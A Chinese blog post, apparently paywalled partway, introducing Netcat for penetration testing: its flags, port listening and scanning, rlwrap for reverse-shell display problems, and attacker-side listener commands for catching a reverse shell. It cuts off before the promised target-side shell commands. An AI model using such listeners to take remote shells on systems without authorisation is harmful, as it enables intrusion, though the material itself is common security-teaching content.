本文详细介绍了Netcat作为渗透测试工具的用途,包括TCP/UDP端口监听、端口扫描、文件传输和网络测速。特别讨论了在Linux环境中反弹shell时遇到的中文乱码问题,提出使用rlwrap工具作为解决方案,并列举了不同编程语言执行反弹shell的命令。此外,还提供了CentOS上安装Netcat的方法。
瑞士军刀Netcat
反弹shell时如果用Linux的netcat监听可能
会出现中文字符、↑↓←→等特殊按键乱码问题,我们可以尝试使用rlwrap工具来解决这个问题。
NC: netcat
一个简单、可靠的网络工具
- nc的作用
(1)实现任意TCP/UDP端口的侦听
可作为server 以TCP或UDP方式侦听指定端口
(2)端口的扫描
nc可以作为client发起TCP或UDP连接
(3)机器之间传输文件
(4)机器之间网络测速
- 控制参数
-l
指定nc将处于侦听模式,被当作server
侦听并接受连接,而非向其它地址发起连接。
-p
暂未用到(老版本的nc可能需要在端口号前加-p参数)
-s
指定发送数据的源IP地址,适用于多网卡机
-u
指定nc使用UDP协议,默认为TCP
-v
输出交互或出错信息
-w
超时秒数,后面跟数字
-z
表示zero,表示扫描时不发送任何数据
https://www.cnblogs.com/nmap/p/6148306.html
NC反弹shell命令
本机开启监听:
nc -lvnp 4444
nc -vvlp 4444
目标机器开启反弹
bash版本:
最低0.47元/天 解锁文章
扫一扫
652
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
